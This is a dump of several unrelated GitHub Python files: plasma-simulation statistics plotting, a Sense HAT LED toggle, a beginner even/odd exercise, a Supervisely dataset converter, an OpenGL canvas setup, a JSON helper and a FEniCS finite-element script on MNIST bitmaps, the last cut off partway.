np.poly1d(ncellsNoiseFitCoeffs)\n fitValues = ncellsNoiseFitF(ncellsUniqueSorted)\n rsquared = r_squared(means,fitValues)\n\n # Plot\n plt.close(\"all\")\n plt.ylabel(\"Noise Amplitude Threshold\")\n plt.xlabel(\"Number of Cells\")\n plt.errorbar(ncellsUniqueSorted,means,yerr=stdErrs,linestyle='none',uplims=True, lolims=True,label=\"Noise Amplitude Error Range\")\n plt.plot(ncellsUniqueSorted, ncellsNoiseFitF(ncellsUniqueSorted), linestyle='dashed',label=r\"Polyfit: \" + '{}'.format(ncellsNoiseFitF) + \"\\n $R^{2}$=\" + f\"{rsquared:.1f}\")\n plt.title(\"L={0:.2f}; npart={1}; samples={2}\".format(L,npart,samples))\n plt.suptitle(\"Landau Damping Noise Amplitude Threshold vs Cells\")\n plt.legend()\n plt.show()\n \n print(\"ncellsUniqueSorted: \", ncellsUniqueSorted)\n print(\"means: \", means)\n print(\"stdErrs: \", stdErrs)\n\ndef task1_noiseAmplitudeParticles(noiseLevelThresholdR, L, ncells, npartR, samples):\n\n # Preprocess, initialise\n nParticlesUniqueSorted = np.unique(npartR)\n means = np.zeros(len(nParticlesUniqueSorted))\n stdErrs = np.zeros(len(nParticlesUniqueSorted))\n stdDevsSample = np.zeros(len(nParticlesUniqueSorted))\n\n # Calculate standard errors and means\n for iNParticle in range(len(nParticlesUniqueSorted)):\n means[iNParticle] = np.mean(noiseLevelThresholdR[np.where(npartR == nParticlesUniqueSorted[iNParticle])])\n stdDevsSample[iNParticle] = np.std(noiseLevelThresholdR[np.where(npartR == nParticlesUniqueSorted[iNParticle])], ddof=1)\n stdErrs = stdDevsSample/np.sqrt(samples)\n\n # Polynomial fit\n nParticlesNoiseFitCoeffs = np.polyfit(nParticlesUniqueSorted, np.log(means), 1)\n nParticlesNoiseFitF = np.poly1d(nParticlesNoiseFitCoeffs)\n fitValues = np.exp(nParticlesNoiseFitF(nParticlesUniqueSorted))\n rsquared = r_squared(np.log(means), np.log(fitValues)) # compare in the fitted (log) space\n\n # Plot\n plt.close(\"all\")\n plt.ylabel(\"Noise Amplitude Threshold\")\n plt.xlabel(\"Number of Particles\")\n 
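# (The fit above was made on log(means), i.e. an exponential model\n # threshold ~ exp(a*N + b), hence the log-scaled y-axis below.)\n 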
plt.errorbar(nParticlesUniqueSorted,means,yerr=stdErrs,linestyle='none',uplims=True, lolims=True,label=\"Noise Amplitude Error Range\")\n plt.plot(nParticlesUniqueSorted, fitValues, linestyle='dashed',label=r\"Polyfit of log: \" + '{}'.format(nParticlesNoiseFitF) + \"\\n $R^{2}$=\" + f\"{rsquared:.1f}\")\n plt.yscale('log')\n plt.title(\"L={0:.2f}; ncells={1}; samples={2}\".format(L,ncells,samples))\n plt.suptitle(\"Landau Damping Noise Amplitude Threshold vs Particles\")\n plt.legend()\n plt.show()\n \n print(\"nParticlesUniqueSorted: \", nParticlesUniqueSorted)\n print(\"means: \", means)\n print(\"stdErrs: \", stdErrs)\n\ndef task1_computationalTime(noiseLevelThresholdR, L, ncellsR, npartR, samples, timeR):\n if len(np.unique(ncellsR))==1: # Convenience for using the same function for both the cells and particles relationships\n mode = 1 # ncells same; nparticles change\n x_unsorted = npartR\n varText = \"Particles\"\n else:\n mode = 2 # nparticles same; ncells change\n x_unsorted = ncellsR\n varText = \"Cells\"\n\n # Preprocess, initialise\n x = np.unique(x_unsorted)\n means = np.zeros(len(x))\n stdErrs = np.zeros(len(x))\n stdDevsSample = np.zeros(len(x))\n\n # Calculate standard errors and means\n for i in range(len(x)):\n means[i] = np.mean(timeR[np.where(x_unsorted == x[i])])\n stdDevsSample[i] = np.std(timeR[np.where(x_unsorted == x[i])], ddof=1)\n stdErrs = stdDevsSample/np.sqrt(samples)\n\n # Polynomial fit\n fitCoeffs = np.polyfit(x, means, 1)\n fitF = np.poly1d(fitCoeffs)\n fitValues = fitF(x)\n rsquared = r_squared(means,fitValues)\n \n # Plot\n plt.close(\"all\")\n plt.ylabel(\"Time [s]\")\n plt.xlabel(\"Number of \"+varText)\n plt.errorbar(x,means,yerr=stdErrs,linestyle='none',uplims=True, lolims=True,label=\"Computational Time; Standard Errors\")\n plt.plot(x, fitValues, linestyle='dashed',label=r\"Polyfit: \" + '{}'.format(fitF) + \"\\n $R^{2}$=\" + f\"{rsquared:.1f}\")\n #plt.yscale('log')\n if mode == 1:\n plt.title(\"L={0:.2f}; ncells={1}; samples={2}\".format(L,ncellsR[0],samples))\n else:\n plt.title(\"L={0:.2f}; npart={1}; samples={2}\".format(L,npartR[0],samples))\n plt.suptitle(\"Landau Damping Computational Time vs \"+varText)\n plt.legend()\n plt.show()\n\n print(varText,\": \", x)\n print(\"means: \", means)\n print(\"stdErrs: \", stdErrs)\n\ndef task2_peakFrequency(L, ncells, npart, samples, oscFrequency):\n mean = np.mean(oscFrequency)\n stdDevSample = np.std(oscFrequency, ddof=1)\n stdErrSample = stdDevSample/np.sqrt(len(oscFrequency))\n\n plt.close(\"all\")\n plt.boxplot(oscFrequency)\n plt.errorbar(1,mean,yerr=stdErrSample,marker='o',linestyle='none',uplims=True, lolims=True,label=\"Means and Standard Error\")\n plt.ylabel(\"Frequency (Normalised)\")\n plt.title(\"L={0:.2f}; ncells={1}; npart={2}; simulations={3};\".format(L,ncells,npart,samples))\n plt.suptitle(\"Landau Damping Frequency: Boxplot\")\n print(\"Mean Frequency: \", np.mean(oscFrequency))\n print(\"SD Sample Frequency: \", np.std(oscFrequency, ddof=1))\n print(\"SE Frequency: \", stdErrSample)\n plt.legend()\n plt.show()\n oscFreqMean = mean\n oscFreqSe = stdErrSample\n\n return oscFreqMean, oscFreqSe\n\ndef task2_globalPeakFit(L, ncells, npart, samples, goodPeakAmplitudes, goodPeakTimes, oscFreqMean, oscFreqSe):\n result = linregress(goodPeakTimes,np.log(goodPeakAmplitudes))\n print(result)\n print(\"On Linear scale, Std Error of slope = \", np.exp(result.stderr))\n print(\"On Linear scale, Std Error of intercept = \", np.exp(result.intercept_stderr))\n \n plt.close(\"all\")\n 
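# (linregress above was run on log(amplitude), so the fitted line is\n # exponentiated below and drawn on a log-scaled y-axis.)\n 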
plt.plot(goodPeakTimes,goodPeakAmplitudes,'o',label=\"Low Noise First Harmonic Peaks\")\n    plt.plot(goodPeakTimes, np.exp(result.intercept + result.slope*goodPeakTimes), label='Fitted line')\n    plt.title(\"L={0:.2f}; npart={1}; ncells={2}; simulations={3}\".format(L,npart,ncells,samples))\n    plt.suptitle(\"Landau Damping Decay Rate Curve Fit\")\n    plt.xlabel(\"Time [s]\")\n    plt.ylabel(\"First Harmonic Amplitude peaks\")\n    plt.yscale('log')\n    plt.legend()\n    plt.show()\n\n    # Damping ratio, angular freq\n    #dampingRatio = result.slope/oscFreqMean\n    dampingRatio = result.slope/sqrt(result.slope**2 + oscFreqMean**2)\n    dampingRatioSe = sqrt(oscFreqSe**2 + result.stderr**2)\n    decayRate = result.slope\n    decayRateSe = result.stderr\n    print(\"angular freq = \", oscFreqMean, \"+-\", oscFreqSe)\n    print(\"damping ratio = \", dampingRatio, \"+-\", dampingRatioSe)\n    print(\"decay rate: \", result.slope, \"+-\", result.stderr)\n    return decayRate, decayRateSe\n\nif __name__ == \"__main__\":\n    \n    PLOTS = False\n\n    # Configuration (All configurable to include multiple values to loop through)\n    samples = 100\n    L_ = [4.*pi]\n    # npart_ = [500, 1000, 2000, 5000, 10000, 15000, 20000, 25000, 30000, 50000]\n    npart_ = [1000]\n    ncells_ = [8]\n    # ncells_ = [10, 50, 100, 150, 200, 250, 300]\n\n    # Initialisations\n    i0 = -1\n    i1 = -1 # iterators\n    i2 = -1\n    i3 = -1\n    \n    # aligned results arrays (all of same length and same simulation, in case multi-d analysis is required)\n    npartR = np.array([]) # results arrays\n    rsiR = np.array([])\n    ncellsR = np.array([])\n    LR = np.array([])\n    timeR = np.array([])\n    noiseLevelThresholdR = np.array([])\n\n    # independent results arrays\n    oscFrequency = np.array([]) # not aligned with R variables\n    goodPeakAmplitudes = np.array([])\n    goodPeakTimes = np.array([])\n\n    # Unique colors\n    color = iter(cm.rainbow(np.linspace(0, 1, samples)))\n\n    for rseed in range(samples): # Loop through for repeats; stats\n        i0 += 1\n        c = next(color) # Plot color iterate\n        random.seed(i0) # random seed fix for when needed to compare if optimisation makes a difference from original source\n\n        for L in L_: # Loop through different values of L\n            i1 += 1 \n\n            for npart in npart_: # Loop through values of nparts\n                i2 += 1\n                \n                for ncells in ncells_: # Loop through values of ncells\n                    i3 += 1\n\n                    # Run the main sim\n                    timeStart = timer()\n                    pos, vel = landau(npart, L)\n                    s = Summary()\n                    run(pos, vel, L, ncells, [s], linspace(0.,20,50))\n                    timeStop = timer()\n                    \n\n                    # Convert to ndarray for convenience\n                    s.t = array(s.t)\n                    s.firstharmonic = array(s.firstharmonic)\n\n                    # Plot for debug visualisation; can comment out if not needed\n                    plt.plot(s.t, s.firstharmonic, label=r\"First harmonic amplitude [Normalised]\", c = c)\n                    plt.yscale('log')\n                    plt.xlabel(\"Time [Normalised]\")\n                    plt.ylabel(\"First harmonic amplitude [Normalised]\")\n                    plt.yscale('log')\n                    plt.title(\"L={0:.2f}; ncells={1}; npart={2}\".format(L,ncells,npart))\n                    plt.suptitle(\"Landau Damping First Harmonic\")\n\n                    # Find peaks\n                    peaksI, peakProperties = find_peaks(s.firstharmonic) # indexes of peaks\n                    peaks = s.firstharmonic[peaksI]\n\n                    # Plot peaks\n                    plt.plot(s.t[peaksI], s.firstharmonic[peaksI], marker='o', linestyle='none',label=r\"Peaks\", c = c)\n\n                    # Find the last good peak / last bad peak\n                    peaksDiff = np.ediff1d(s.firstharmonic[peaksI]) # diff between consecutive values\n                    risePeaksIndices, = np.where(peaksDiff>0) # offset by one, since it's diff\n                    if len(risePeaksIndices) ==0: # if no positive peak difference\n                        lastGoodPeakI = len(peaksI) - 1 # Set to last 
peak\n                        firstBadPeak = lastGoodPeakI # Assuming it gets worse after this\n                    else:\n                        lastGoodPeakI = risePeaksIndices[0] # Set to last peak before the first rise\n                        firstBadPeak = lastGoodPeakI+1\n                    #print(\"lastGoodPeakI\", lastGoodPeakI)\n\n                    # Line fit for good peaks ; just here for debug visualisation; can comment out\n                    fitLineGoodPeaks = np.polyfit(s.t[peaksI[:lastGoodPeakI+1]], np.log(s.firstharmonic[peaksI[:lastGoodPeakI+1]]), 1) # taking log of peaks, and doing a line fit\n                    fitLineGoodPeaksF = np.poly1d(fitLineGoodPeaks) # Create a fit function from the polyfit\n                    fit_Rsq = r_squared(s.firstharmonic[peaksI[:lastGoodPeakI+1]], np.exp(fitLineGoodPeaksF(s.t[peaksI[:lastGoodPeakI+1]]))) # Find R^2\n\n                    # Frequency estimate, # can comment out when not needed\n                    peakTimeDiffs = np.ediff1d(s.t[peaksI])\n                    if lastGoodPeakI > 0: # At least two valid peaks to calc frequency\n                        oscFrequency = np.append(oscFrequency, np.pi/peakTimeDiffs[0:lastGoodPeakI])\n                        # print(oscFrequency)\n                        # validPeakTimeDiffs = peakTimeDiffs[0:lastGoodPeakI]\n                        # for timeDiff in validPeakTimeDiffs:\n                        #     oscFrequency = np.append(oscFrequency, 1/timeDiff)\n\n                    # Peaks collation for fit outside of loop; # can comment out when not needed\n                    if lastGoodPeakI > 0: # At least two valid peaks to calc frequency\n                        goodPeakAmplitudes = np.append(goodPeakAmplitudes, s.firstharmonic[peaksI[0:lastGoodPeakI+1]])\n                        goodPeakTimes = np.append(goodPeakTimes, s.t[peaksI[0:lastGoodPeakI+1]])\n                    #print(\"s.firstharmonic[peaksI[0:lastGoodPeakI+1]]: \", s.firstharmonic[peaksI[0:lastGoodPeakI+1]])\n                    #print(\"goodPeakAmplitudes\", goodPeakAmplitudes)\n\n\n                    # Results\n                    noiseLevelThreshold = s.firstharmonic[peaksI[firstBadPeak]] # 3-d array format\n                    #print(\"Noise Level Amplitude Threshold for \", L, \"L; \", npart, \"nparts; \", ncells, \"ncells is: \", noiseLevelThreshold)\n                    \n                    # Results in 1d arrays\n                    rsiR = np.append(rsiR, i0)\n                    npartR = np.append(npartR, npart)\n                    ncellsR = np.append(ncellsR, ncells)\n                    LR = np.append(LR, L)\n                    noiseLevelThresholdR = np.append(noiseLevelThresholdR, noiseLevelThreshold)\n                    timeR = np.append(timeR, timeStop-timeStart)\n                    \n\n                    #plt.close(\"all\")\n                    plt.plot(s.t[peaksI[:lastGoodPeakI+1]],np.exp(fitLineGoodPeaksF(s.t[peaksI[:lastGoodPeakI+1]])), linestyle='dashed', label=r\"Fit Line for low noise data\", c = c)\n\n\n    # Show plot\n    if PLOTS:\n        plt.legend()\n        plt.show()\n\n    \n    print(noiseLevelThreshold)\n\n    # Function calls for individual tasks (Will be commented out where not applicable)\n    # task1_noiseAmplitude(noiseLevelThresholdR, L, ncells, npart) \n    # task1_noiseAmplitudeCells(noiseLevelThresholdR, L, ncellsR, npart, samples)\n    # task1_noiseAmplitudeParticles(noiseLevelThresholdR, L, ncells, npartR, samples)\n    # task1_computationalTime(noiseLevelThresholdR, L, ncellsR, npartR, samples, timeR)\n    oscFreqMean, oscFreqSe = task2_peakFrequency(L, ncells, npart, samples, oscFrequency)\n    decayRateMean, decayRateSe = task2_globalPeakFit(L, ncells, npart, samples, goodPeakAmplitudes, goodPeakTimes, oscFreqMean, oscFreqSe)\n    #task2_BoxCompare = (L, ncells, npart, samples, goodPeakAmplitudes, goodPeakTimes, oscFreqMean, oscFreqSe)\n\n    \n    \n    # plot \n    #plt.plot(s.t, s.firstharmonic, label=r\"First harmonic amplitude [Normalised]\")\n    plt.xlabel(\"Number of Particles\")\n    plt.ylabel(\"Number of Cells\")\n    plt.title(\"Landau Damping Amplitude Noise Threshold vs Particle and Cell Number\")\n    plt.scatter(npartR, ncellsR, 
s=noiseLevelThresholdR)\n\n\n\n\n","repo_name":"mehfoos/Nuclear-Fusion","sub_path":"CompuLab/epcRun_2.py","file_name":"epcRun_2.py","file_ext":"py","file_size_in_byte":16126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19092859216","text":"#!/usr/bin/python\n\nimport time\nfrom sense_hat import SenseHat\n\ns = SenseHat()\ns.low_light = True\ngreen = (0, 255, 0)\nyellow = (255, 255, 0)\nblue = (0, 0, 255)\nred = (255, 0, 0)\nwhite = (255, 255, 255)\nnothing = (0, 0, 0)\ncolors = [nothing, green, yellow, red]\nmax = len(colors) - 1\ncurrent = 1\nprev = 0\noff = 0\n\n\ndef init():\n W = white\n B = blue\n O = nothing\n logo = (\n O, O, O, O, O, O, O, O,\n O, O, O, O, O, O, O, O,\n W, W, W, B, O, O, O, B,\n W, O, W, B, O, O, O, B,\n W, W, W, B, O, B, O, B,\n W, O, W, O, B, O, B, O,\n O, O, O, O, O, O, O, O,\n O, O, O, O, O, O, O, O,\n )\n return logo\n\n\ndef color(pos=0):\n global current\n\n if pos > 0:\n global prev\n prev = current\n\n current = pos\n return colors[current] * 64\n\n\ntry:\n s.set_pixels(init())\n time.sleep(1)\n s.set_pixels(color(1))\n\n while True:\n for event in s.stick.get_events():\n if event.action == 'released':\n if event.direction == 'middle':\n off ^= 1\n s.set_pixels(color(0 if off == 1 else prev))\n elif off == 0:\n current = current + 1 if event.direction == 'up' else current - 1\n current = max if current < 1 else 1 if current > max else current\n s.set_pixels(color(current))\n\nexcept KeyboardInterrupt:\n s.set_pixels(color(0))\n","repo_name":"avoidwork/sensehat","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15265659023","text":"\"\"\"\nWrite a program that takes an integer input from the user and determines if it is even or not. 
\nThe program should print 'Even' if the number is even, and 'Odd' if the number is odd\n\"\"\"\ndef determineEvenOdd(number):\n    if number%2 == 0:\n        print(\"Even\")\n    else:\n        print(\"Odd\")\n\nnumber = int(input(\"Enter a number: \"))\ndetermineEvenOdd(number)","repo_name":"abhitatachar2000/Python101","sub_path":"Topic 1 - Numbers and Arithmetic/evenOdd.py","file_name":"evenOdd.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73374720374","text":"# https://github.com/avadesh02/MangoNet-Semantic-Dataset\n\nimport os\nimport shutil\nfrom urllib.parse import unquote, urlparse\n\nimport numpy as np\nimport supervisely as sly\nfrom cv2 import connectedComponents\nfrom dataset_tools.convert import unpack_if_archive\nfrom dotenv import load_dotenv\nfrom supervisely.io.fs import get_file_name, get_file_size\nfrom tqdm import tqdm\n\nimport src.settings as s\n\n\ndef fix_masks(image_np: np.ndarray) -> np.ndarray:\n    lower_bound = np.array([70, 110, 0])\n    upper_bound = np.array([255, 255, 255])\n    condition_white = np.logical_and(\n        np.all(image_np >= lower_bound, axis=2), np.all(image_np <= upper_bound, axis=2)\n    )\n\n    lower_bound = np.array([0, 0, 0])\n    upper_bound = np.array([20, 20, 20])\n    condition_black = np.logical_and(\n        np.all(image_np >= lower_bound, axis=2), np.all(image_np <= upper_bound, axis=2)\n    )\n\n    image_np[np.where(condition_white)] = (255, 255, 255)\n    image_np[np.where(condition_black)] = (0, 0, 0)\n\n    return image_np\n\ndef count_files(path, extension):\n    count = 0\n    for root, dirs, files in os.walk(path):\n        for file in files:\n            if file.endswith(extension):\n                count += 1\n    return count\n    \ndef convert_and_upload_supervisely_project(\n    api: sly.Api, workspace_id: int, project_name: str\n) -> sly.ProjectInfo:\n\n    # project_name = \"MangoNet\"\n    dataset_path = \"/home/grokhi/rawdata/MangoNet-Semantic-Dataset/MangoNet Dataset\"\n    ds_name = \"ds\"\n    batch_size = 3\n    images_folder_name = \"original images\"\n    masks_folder_name = \"annotated images\"\n    masks_ext = \".jpg\"\n    masks_prefix = \"Class_\"\n\n\n    def create_ann(image_path):\n        labels = []\n\n        image_name = get_file_name(image_path)[5:]\n        mask_name = masks_prefix + image_name + masks_ext\n        mask_path = os.path.join(masks_pathes, mask_name)\n        ann_np = sly.imaging.image.read(mask_path)[:, :, :]\n        ann_np = fix_masks(ann_np)[:, :, 0]\n        img_height = ann_np.shape[0]\n        img_width = ann_np.shape[1]\n        mask = ann_np != 0\n        ret, curr_mask = connectedComponents(mask.astype(\"uint8\"), connectivity=8)\n        for i in range(1, ret):\n            obj_mask = curr_mask == i\n            curr_bitmap = sly.Bitmap(obj_mask)\n            if curr_bitmap.area > 100:\n                curr_label = sly.Label(curr_bitmap, obj_class)\n                labels.append(curr_label)\n\n        return sly.Annotation(img_size=(img_height, img_width), labels=labels)\n\n\n    obj_class = sly.ObjClass(\"mango\", sly.Bitmap)\n\n    project = api.project.create(workspace_id, project_name, change_name_if_conflict=True)\n    meta = sly.ProjectMeta(obj_classes=[obj_class])\n    api.project.update_meta(project.id, meta.to_json())\n\n    for ds_name in os.listdir(dataset_path):\n        dataset = api.dataset.create(project.id, ds_name, change_name_if_conflict=True)\n\n        curr_ds_path = os.path.join(dataset_path, ds_name)\n\n        images_pathes = os.path.join(curr_ds_path, images_folder_name)\n        masks_pathes = os.path.join(curr_ds_path, masks_folder_name)\n        images_names = os.listdir(images_pathes)\n\n        progress = sly.Progress(\"Create dataset 
{}\".format(ds_name), len(images_names))\n\n for img_names_batch in sly.batched(images_names, batch_size=batch_size):\n images_pathes_batch = [\n os.path.join(images_pathes, image_path) for image_path in img_names_batch\n ]\n\n anns_batch = [create_ann(image_path) for image_path in images_pathes_batch]\n\n img_infos = api.image.upload_paths(dataset.id, img_names_batch, images_pathes_batch)\n img_ids = [im_info.id for im_info in img_infos]\n\n api.annotation.upload_anns(img_ids, anns_batch)\n\n progress.iters_done_report(len(img_names_batch))\n return project\n\n\n","repo_name":"dataset-ninja/mangonet-semantic-dataset","sub_path":"src/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":3825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18844749753","text":"from glfw.GLFW import *\r\nimport OpenGL.GL as gl\r\nfrom sys import stderr\r\nimport numpy as np\r\nimport util\r\nimport graphics.shader as shader\r\nimport ctypes\r\nfrom PIL import Image\r\nimport random as rand\r\nimport graphics.computeShader as comp\r\n\r\n# fmt: off\r\n# vertex -> x, y, z, u, v\r\nvertices = [\r\n -1, 1, 0, 0, 1, # top-left\r\n 1, 1, 0, 1, 1, # top-right\r\n 1, -1, 0, 1, 0, # bottom-right\r\n -1, -1, 0, 0, 0, # bottom-left\r\n]\r\n\r\nindices = [0, 1, 3, \r\n 1, 2, 3] # upper triangle # lower triangle\r\n# fmt: on\r\n\r\n\r\ndef initRenderCavas(self):\r\n floatSize = 4\r\n int32Size = 4\r\n\r\n # setup buffers\r\n self.sceneRenderer.vao = gl.glGenVertexArrays(1)\r\n self.sceneRenderer.vbo = gl.glGenBuffers(1)\r\n self.sceneRenderer.ebo = gl.glGenBuffers(1)\r\n\r\n gl.glBindVertexArray(self.sceneRenderer.vao)\r\n\r\n gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.sceneRenderer.vbo)\r\n gl.glBufferData(\r\n gl.GL_ARRAY_BUFFER,\r\n len(vertices) * floatSize,\r\n np.array(vertices, dtype=\"float32\"),\r\n gl.GL_STATIC_DRAW,\r\n )\r\n\r\n gl.glBindBuffer(gl.GL_ELEMENT_ARRAY_BUFFER, self.sceneRenderer.ebo)\r\n gl.glBufferData(\r\n gl.GL_ELEMENT_ARRAY_BUFFER,\r\n len(indices) * int32Size,\r\n np.array(indices, dtype=\"uint32\"),\r\n gl.GL_STATIC_DRAW,\r\n )\r\n\r\n gl.glVertexAttribPointer(0, 3, gl.GL_FLOAT, gl.GL_FALSE, 5 * floatSize, None)\r\n gl.glVertexAttribPointer(\r\n 1, 2, gl.GL_FLOAT, gl.GL_FALSE, 5 * floatSize, ctypes.c_void_p(3 * floatSize)\r\n )\r\n gl.glEnableVertexAttribArray(0)\r\n gl.glEnableVertexAttribArray(1)\r\n\r\n gl.glBindVertexArray(self.sceneRenderer.vao)\r\n\r\n # Shader for quad\r\n self.sceneRenderer.shaderProgram = shader.generateShaderProgram(\r\n \"./src/shader_code/vertex.vert\", \"./src/shader_code/fragment.frag\"\r\n )\r\n\r\n shader.useShader(self.sceneRenderer.shaderProgram)\r\n\r\n self.sceneRenderer.tex = gl.glGenTextures(1)\r\n gl.glActiveTexture(gl.GL_TEXTURE0)\r\n gl.glBindTexture(gl.GL_TEXTURE_2D, self.sceneRenderer.tex)\r\n # gl.glUniform1i(gl.glGetUniformLocation(shaderProgram, \"ourTex\"), 0)\r\n\r\n gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MAG_FILTER, gl.GL_NEAREST)\r\n gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MIN_FILTER, gl.GL_LINEAR)\r\n\r\n viewport = gl.glGetIntegerv(gl.GL_VIEWPORT)\r\n width = viewport[2]\r\n height = viewport[3]\r\n\r\n gl.glTexImage2D(\r\n gl.GL_TEXTURE_2D,\r\n 0,\r\n gl.GL_RGBA32F,\r\n self.resolution[0],\r\n self.resolution[1],\r\n 0,\r\n gl.GL_RGBA,\r\n gl.GL_FLOAT,\r\n None,\r\n )\r\n # gl.glTexImage2D(gl.GL_TEXTURE_2D, 0, gl.GL_RGB, 1920, 1080, 0, gl.GL_RGB, gl.GL_UNSIGNED_BYTE, data)\r\n\r\n gl.glBindImageTexture(\r\n 0, self.sceneRenderer.tex, 0, 
gl.GL_FALSE, 0, gl.GL_WRITE_ONLY, gl.GL_RGBA32F\r\n )\r\n\r\n # init compute shader\r\n self.sceneRenderer.compute = comp.compileComputeShader(\"./src/shader_code/raytracer.comp\")\r\n # self.compute = comp.compileComputeShader(\"./src/shader_code/mandelbrot.comp\")\r\n\r\n\r\ndef resizeTexture(self):\r\n\r\n gl.glActiveTexture(gl.GL_TEXTURE0)\r\n gl.glBindTexture(gl.GL_TEXTURE_2D, self.sceneRenderer.tex)\r\n\r\n\r\n gl.glTexImage2D(\r\n gl.GL_TEXTURE_2D,\r\n 0,\r\n gl.GL_RGBA32F,\r\n self.resolution[0],\r\n self.resolution[1],\r\n 0,\r\n gl.GL_RGBA,\r\n gl.GL_FLOAT,\r\n None,\r\n )\r\n","repo_name":"RandomPigYT/raytracer","sub_path":"src/core/canvas.py","file_name":"canvas.py","file_ext":"py","file_size_in_byte":3406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30596340245","text":"import json\nimport unicodedata\n\n\ndef read_info(json_path):\n items = [json.loads(line) for line in open(json_path).readlines()]\n ret = {}\n for item in items:\n item_id = item[\"item_id\"]\n ret[item_id] = item\n return ret\n\n\ndef read_pair(json_path):\n items = [json.loads(line) for line in open(json_path).readlines()]\n return items\n\n\ndef clean_str(s):\n # https://blog.csdn.net/Owen_goodman/article/details/107783304\n return unicodedata.normalize(\"NFKC\", s.replace(\"#\", \"\").lower())\n\n\ndef str2dict(s):\n d = {}\n s_split = s.split(\";\")\n for sub_str in s_split:\n sub_str_split = sub_str.split(\":\")\n p = sub_str_split[0]\n v = \":\".join(sub_str_split[1:])\n if p not in d:\n d[p] = set()\n d[p].add(v)\n for k in d:\n d[k] = \",\".join(d[k])\n return d\n","repo_name":"hanchenchen/CCKS2022-track2-solution","sub_path":"src/data/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"25709745334","text":"##########################################################################################\n# import necessary modules (list of all simulation running modules)\n##########################################################################################\nimport os\nfrom fenics import *\nfrom dolfin import *\nfrom mshr import *\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nimport time\nstart_time = time.time()\n##########################################################################################\n# input info / get input file imported \n##########################################################################################\n# https://fenicsproject.org/pub/tutorial/html/._ftut1017.html\n##########################################################################################\nnum = int(sys.argv[1]) # command line argument indicates the bitmap to use\n\nis_train = int(sys.argv[2]) == 1 # indicates if it's test or train \n\nmref = 4 #int(sys.argv[2]) # indicates mesh size -- can set up as command line arg as needed\n\nif is_train:\n fname = 'train_data_' + str(num)\nelse:\n fname = 'test_data_' + str(num)\n \n \nfolder_name = 'folder' + '_' + fname + '_' + 'mesh' + str(mref) # output folder \nif not os.path.exists(folder_name):\n os.makedirs(folder_name)\n\n# --> import input bitmap\ninput_folder = '../sample_data' # location of the bitmaps -- may have to update\n\nif is_train:\n line = np.loadtxt(input_folder + '/mnist_img_train.txt')[num,:] # <--MNIST data\nelse:\n line = np.loadtxt(input_folder + '/mnist_img_test.txt')[num,:]\n\ndata_import = line.reshape((28,28))\n\n# --> for 
laptop data_import = np.loadtxt('input_data/train_data_%i.txt'%(num))\n\n# --> flip input bitmap \ndata = np.zeros(data_import.shape)\nfor jj in range(0,data.shape[0]):\n\tfor kk in range(0,data.shape[1]):\n\t\tdata[jj,kk] = data_import[int(27.0 - kk),jj] #jj is columns of input, kk is rows\n\n##########################################################################################\n# compiler settings / optimization options \n##########################################################################################\nparameters[\"form_compiler\"][\"cpp_optimize\"] = True\nparameters[\"form_compiler\"][\"representation\"] = \"uflacs\"\nparameters[\"form_compiler\"][\"quadrature_degree\"] = 2 #TODO 2\nparameters['form_compiler'].add('eliminate_zeros', False)\n\n##########################################################################################\n# problem geometry \n##########################################################################################\np_1_x = 0.0; p_1_y = 0.0; p_1_z = 0.0 \np_2_x = 28.0; p_2_y = 28.0; p_2_z = 4.0\nnx = int(7*mref) #nx = int(28*mref)\nny = int(7*mref)#ny = int(28*mref)\nnz = int(mref) \n##########################################################################################\n# mesh and function spaces \n##########################################################################################\nmesh = BoxMesh(Point(p_1_x,p_1_y,p_1_z),Point(p_2_x,p_2_y,p_2_z),nx,ny,nz)\n\n##########################################################################################\n# mesh and material prop\n##########################################################################################\nP2 = VectorElement(\"Lagrange\", mesh.ufl_cell(), 2) #TODO 2\nTH = P2\nW = FunctionSpace(mesh, TH)\nV = FunctionSpace(mesh, 'CG', 1)\nback = 1.0\nhigh = 100.0 \nnu = 0.3\nmaterial_parameters = {'back':back, 'high':high, 'nu':nu}\n\ndef bitmap(x,y): #there could be a much better way to do this, but this is working within the confines of ufl\n\ttotal = 0 \n\tfor jj in range(0,data.shape[0]):\n\t\tfor kk in range(0,data.shape[1]):\n\t\t\tconst1 = conditional(x>=jj,1,0) # x is rows\n\t\t\tconst2 = conditional(x<jj+1,1,0)\n\t\t\tconst3 = conditional(y>=kk,1,0) # y is columns \n\t\t\tconst4 = conditional(y<kk+1,1,0)\n\t\t\tconst = conditional(const1+const2+const3+const4>3,1,0) #ufl equality is not working, would like to make it sum == 4 \n\t\t\ttotal += const*data[jj,kk]\n\treturn total\n\nclass GetMat:\n\tdef __init__(self,material_parameters,mesh):\n\t\tmp = material_parameters\n\t\tself.mesh = mesh\n\t\tself.back = mp['back']\n\t\tself.high = mp['high']\n\t\tself.nu = mp['nu']\n\tdef getFunctionMaterials(self, V):\n\t\tself.x = SpatialCoordinate(self.mesh)\n\t\tval = bitmap(self.x[0],self.x[1])\n\t\tE = val/255.0*(self.high-self.back) + self.back\n\t\teffectiveMdata = {'E':E, 'nu':self.nu}\n\t\treturn effectiveMdata\n\nmat = GetMat(material_parameters, mesh)\nEmatData = mat.getFunctionMaterials(V)\nE = EmatData['E']\nnu = EmatData['nu']\nlmbda, mu = (E*nu/((1.0 + nu )*(1.0-2.0*nu))) , (E/(2*(1+nu)))\nmatdomain = MeshFunction('size_t',mesh,mesh.topology().dim())\ndx = Measure('dx',domain=mesh, subdomain_data=matdomain)\n\n##########################################################################################\n# define boundary domains 